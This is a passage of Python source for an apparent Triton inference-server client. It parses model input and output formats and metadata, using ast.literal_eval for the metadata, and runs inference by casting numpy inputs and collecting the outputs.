        self.input_formats = [x["data_type"] for x in config["input"]]
        self.np_input_formats = [type_map[x] for x in self.input_formats]
        self.input_names = [x["name"] for x in config["input"]]
        self.output_names = [x["name"] for x in config["output"]]
        self.metadata = self._parse_metadata(config)

    @staticmethod
    def _parse_metadata(config):
        """
        Parse the 'metadata' parameter of a model config into a Python object.

        The string comes from the remote server, so it is parsed with ast.literal_eval (literals only) rather
        than eval(), which would execute arbitrary expressions supplied by the server.

        Args:
            config (dict): Model configuration as returned by the Triton client.

        Returns:
            The parsed literal (e.g. a dict), or None when no metadata string is present.
        """
        import ast  # local import keeps this block self-contained

        raw = config.get("parameters", {}).get("metadata", {}).get("string_value", "None")
        return ast.literal_eval(raw)

    def __call__(self, *inputs: np.ndarray) -> List[np.ndarray]:
        """
        Call the model with the given inputs.

        Each input is cast to the dtype the model declares for that position before being sent; every output is
        cast back to the dtype of the first input.

        Args:
            *inputs (np.ndarray): Input data to the model, in the order of the model's declared inputs.

        Returns:
            (List[np.ndarray]): Model outputs, ordered by output name.
        """
        infer_inputs = []
        input_format = inputs[0].dtype  # remembered so outputs can be returned in the caller's dtype
        for i, x in enumerate(inputs):
            if x.dtype != self.np_input_formats[i]:
                x = x.astype(self.np_input_formats[i])
            # Triton expects the datatype name without the 'TYPE_' prefix, e.g. 'FP32'
            infer_input = self.InferInput(self.input_names[i], [*x.shape], self.input_formats[i].replace("TYPE_", ""))
            infer_input.set_data_from_numpy(x)
            infer_inputs.append(infer_input)

        infer_outputs = [self.InferRequestedOutput(output_name) for output_name in self.output_names]
        outputs = self.triton_client.infer(model_name=self.endpoint, inputs=infer_inputs, outputs=infer_outputs)

        return [outputs.as_numpy(output_name).astype(input_format) for output_name in self.output_names]